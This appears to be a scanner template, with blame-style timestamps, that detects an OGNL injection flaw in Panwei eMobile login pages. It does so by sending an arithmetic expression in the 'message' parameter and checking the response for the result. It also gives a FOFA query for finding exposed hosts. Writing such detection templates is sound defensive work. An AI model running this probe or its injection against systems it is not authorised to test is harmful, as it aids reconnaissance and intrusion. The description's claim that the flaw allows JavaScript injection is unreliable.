2022-08-11 19:05:26 +00:00
id : CNVD-2017-03561
info :
2022-10-10 19:22:59 +00:00
name : Panwei eMobile - OGNL Injection
2022-08-11 19:05:26 +00:00
author : ritikchaddha
severity : high
2022-10-10 19:22:59 +00:00
description : Panwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
2022-08-11 19:05:26 +00:00
reference :
- https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
2022-10-10 19:22:59 +00:00
- https://reconshell.com/vulnerability-research-list/
2022-08-11 19:05:26 +00:00
metadata :
verified : true
fofa-query : app="泛微-eMobile"
tags : cnvd,cnvd2017,emobile,ognl,panwei
variables :
num1 : "9999"
num2 : "5555"
requests :
- method : GET
path :
- "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
- "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- '55544445'
- type : status
status :
- 200
2022-10-10 19:22:59 +00:00
# Enhanced by mp on 2022/09/30